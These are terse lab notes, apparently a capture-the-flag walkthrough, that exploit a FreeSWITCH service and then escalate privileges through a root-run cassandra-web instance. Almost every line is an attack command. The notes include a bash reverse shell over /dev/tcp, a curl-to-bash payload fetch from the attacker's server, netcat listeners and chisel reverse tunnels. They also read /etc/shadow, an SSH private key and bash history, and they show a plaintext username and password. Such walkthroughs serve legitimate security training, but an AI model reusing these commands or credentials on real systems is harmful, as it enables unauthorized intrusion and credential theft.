Now using the exploit:
searchsploit -m windows/remote/47799.txt
Now renaming:
mv 47799.txt freeswitch.py
python3 freeswitch.py 192.168.221.240 'whoami'
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.236/80 0>&1
Start a python server:
python3 -m http.server 8021
Now start a listener:
sudo rlwrap nc -nlvp 80
We can get a shell:
python3 freeswitch.py 192.168.221.240 'curl http://192.168.45.236:8021/shell.sh|bash'
cassie : SecondBiteTheApple330
sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:4444
Now we are running cassandra as root on port 4444.
Now we can forward the port on one more port:
wget http://192.168.45.228:8021/chisel
Now we can run chisel on kali:
chisel server --reverse --socks5 -p 80
On target:
./chisel client 192.168.45.228:80 R:4444:127.0.0.1:4444
python3 cassandra.py -p 4444 127.0.0.1 /etc/shadow
Now we can try getting anthony's ssh key:
python3 cassandra.py -p 4444 127.0.0.1 /home/anthony/.ssh/id_rsa
python3 cassandra.py -p 4444 127.0.0.1 /home/anthony/.bash_history
ssh root@192.168.236.240 -i id_rsa